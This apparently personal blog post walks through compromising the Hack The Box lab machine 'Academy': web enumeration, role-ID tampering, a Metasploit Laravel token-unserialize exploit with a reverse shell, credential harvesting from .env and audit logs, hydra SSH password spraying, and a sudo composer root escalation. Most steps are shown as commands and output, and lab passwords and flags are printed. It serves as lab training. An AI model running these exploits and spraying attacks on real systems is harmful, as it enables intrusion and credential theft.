HTB Academy Walkthrough

Walkthrough of HTB Academy Box

Academy Walkthrough

images/Untitled.png

Enumeration

running nmap scan we find two ports (22, 80) are open and the machine also leaks a hostname as academy.htb

# Nmap 7.91 scan initiated Sun Jan 10 12:56:59 2021 as: nmap -sC -sV -oA nmap/tcp-initial -vv 10.10.10.215
Nmap scan report for 10.10.10.215
Host is up, received reset ttl 63 (0.20s latency).
Scanned at 2021-01-10 12:56:59 IST for 16s
Not shown: 998 closed ports
Reason: 998 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/0BA3dU0ygKCvP7G3GklCeOqxb17vxMCsugN05RA9Fhj7AzkPiMLrrKRY656gBuscH23utAWAhRXzV1SyU37bbFzEbfaqYAlh1ggHEuluLgbf9QsYZe76zCx2SRPOzoI9Q40klVvuu9E92pNLe80dvUZj644EwhJTGw4KGxeOqeuo/nXnYfiNAbWvOe9Qp+djDbEvP5lHwIDMTAtgggoSC1chubC3jFC4hihuYjtitjUr4+5fROomhJAo/GEvdBj2CYNHIFEvmuvb32cgul5ENQS4fJXpcI7fbP9/+b/cfA9oRxG2k+k1M8mUld2h5mHEVBE5Z9WKS3cRYu97oVKnRRCoDY/55mZw6lngIdH4drpYwzCrZcCWgviXRfCeOwmZ8sucap6qN/nFYnPoF7fd+LGaQOhz9MkAZCTMmLqSiZGSistAIPzHtABH0VQDbo2TqJ+kGWr9/EamCcYBbVVPaFj/XQqujoEjLYW+igihwrPEQ7zxlleQHwg91oSVy38=
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAIMsz8qKL1UCyrPmpM5iTmoy3cOsk+4L7oFdcPjBXwAcUVvnti7nXHlNqMfgsapbGSIl7AWTOeXLZmw2J6JWvE=
|   256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBP1E2rWeTShvyJKxC5Brv1Do3OwvWIzlZHWVw/bD0R
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 10 12:57:15 2021 -- 1 IP address (1 host up) scanned in 16.83 seconds

Initial Foothold

visiting the port 80 on web browser we are greeted by the htb academy website where we can login and register after registering an account we can login and we get to the dashboard.

images/Untitled%201.png

running gobuster on the server we find another webpage as /admin.php which has a login page.

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://academy.htb/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2021/01/10 13:27:34 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/admin.php (Status: 200)
/admin.php (Status: 200)

After further enumeration we find that n the registration form a roleid=0 parameter is being passed to the webserver and if we change that roleid=0 to roleid=1 we get registered as the admin.

images/Untitled%202.png

Now we can login as admin on /admin.php here we find a subdomain as dev-staging-01.academy.htb

images/Untitled%203.png

adding this subdomain to /etc/hosts then visiting the website we get an error page.

images/Untitled%204.png

Going through error page we see that the APP_KEY is exposed as base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

Doing a searchsploit for laravel we see a metasploit module for RCE

┌──(codacker㉿kali)-[~/…/HTB/boxes/Academy/laravel_rce-master]
└─$ searchsploit laravel                                                                                                                                          1 ⨯
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                      |  Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Laravel - 'Hash::make()' Password Truncation Security                                                                               | multiple/remote/39318.txt
Laravel Administrator 4 - Unrestricted File Upload (Authenticated)                                                                  | php/webapps/49112.py
Laravel Log Viewer < 0.13.0 - Local File Download                                                                                   | php/webapps/44343.py
Laravel Nova 3.7.0 - 'range' DoS                                                                                                    | php/webapps/49198.txt
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)                             | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read                                                                           | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload                                                                  | php/webapps/46389.py
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

running the metasploit exploit we get the shell back to us

msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options 

Module options (exploit/unix/http/laravel_token_unserialize_exec):

   Name       Current Setting                               Required  Description
   ----       ---------------                               --------  -----------
   APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.215                                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                            yes       The target port (TCP)
   SSL        false                                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                                             yes       Path to target webapp
   VHOST      dev-staging-01.academy.htb                    no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.13      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.13:4444 
msf6 exploit(unix/http/laravel_token_unserialize_exec) > 
[*] Command shell session 3 opened (10.10.14.13:4444 -> 10.10.10.215:53780) at 2021-01-10 15:23:50 +0530

now we can upgrade the shell to meterpreter using the following command.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]

[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.14.13:4433 
[*] Sending stage (976712 bytes) to 10.10.10.215
[*] Meterpreter session 4 opened (10.10.14.13:4433 -> 10.10.10.215:52404) at 2021-01-10 15:25:04 +0530
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(unix/http/laravel_token_unserialize_exec) > 
[*] Stopping exploit/multi/handler

User

now while enumerating we find a .env file inside /var/www/html/academy

meterpreter > cat .env                                                                                                                                                
APP_NAME=Laravel                                                                                                                                                      
APP_ENV=local                                                                      
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=     
APP_DEBUG=false                                                                    
APP_URL=http://localhost                                                           

LOG_CHANNEL=stack       
                                         
DB_CONNECTION=mysql           
DB_HOST=127.0.0.1             
DB_PORT=3306                             
DB_DATABASE=academy                                                                
DB_USERNAME=dev                                                                    
DB_PASSWORD=mySup3rP4s5w0rd!!

which contains a password. Now seeing the file /etc/passwd we can find a list of users on the machine.

egre55❌1000:1000:egre55:/home/egre55:/bin/bash
lxd❌998💯:/var/snap/lxd/common/lxd:/bin/false
mrb3n❌1001:1001::/home/mrb3n:/bin/sh
cry0l1t3❌1002:1002::/home/cry0l1t3:/bin/sh
mysql❌112:120:MySQL Server,,,:/nonexistent:/bin/false
21y4d❌1003:1003::/home/21y4d:/bin/sh
ch4p❌1004:1004::/home/ch4p:/bin/sh
g0blin❌1005:1005::/home/g0blin:/bin/sh

creating a list user using the /etc/passwd

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Academy]
└─$ cat users.txt   
egre55
lxd
mrb3n
cry0l1t3
mysql
21y4d
ch4p
g0blin

now we use hydra to spray the password we found.

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Academy]
└─$ hydra -L users.txt -p 'mySup3rP4s5w0rd!!' ssh://10.10.10.215                                                                                                255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 15:32:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking ssh://10.10.10.215:22/
[22][ssh] host: 10.10.10.215   login: cry0l1t3   password: mySup3rP4s5w0rd!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 15:32:14

we find that the password is valid for the user cry0l1t3 now we can login using the username and password to get the user hash.

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Academy]                                                                                                                   
└─$ ssh [email protected]
...
[email protected]:~$ cat user.txt
6c004cc3ef7cc9ec5d0c0935e57241e0

Root

now running linpeas on the server i wasn’t able to find anything interesting so i decided to do it manually. Running id we find that we are member of adm group

[email protected]:~$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

being part of adm group we can read logs. Reading the audit.log and grepping for su we find a hex string reversing which we get a password as [email protected]! This part is really really guessy

[email protected]:/var/log/audit$ cat * | grep '"su"'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
[email protected]:/var/log/audit$ echo "6D7262336E5F41634064336D79210A" | xxd -r -p
[email protected]!
[email protected]:/var/log/audit$

now again doing the password spray attack using hydra we find that the password is for mrb3n

┌──(codacker㉿kali)-[~/Workspace/HTB/boxes/Academy]
└─$ hydra -L users.txt -p '[email protected]!' ssh://10.10.10.215
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-10 16:25:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking ssh://10.10.10.215:22/
[22][ssh] host: 10.10.10.215   login: mrb3n   password: [email protected]!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-10 16:25:09

now we get shell as mrb3n running sudo -l we can see we can run composer as root.

[email protected]:~$ sudo -l
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
[email protected]:~$

running the following command we can get shell as root.

[email protected]:~$ sudo -l
[sudo] password for mrb3n: 
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
[email protected]:~$ TF=$(mktemp -d)
[email protected]:~$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
[email protected]:~$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id

now we can get the root hash.

bf22ce6cfd5e018e931587da93c76464
Student

A passionate geek who loves to break stuff and then make it again, with interests in cloud infrastructure, network security, reverse engineering, malware analysis and exploit development. Codacker

Related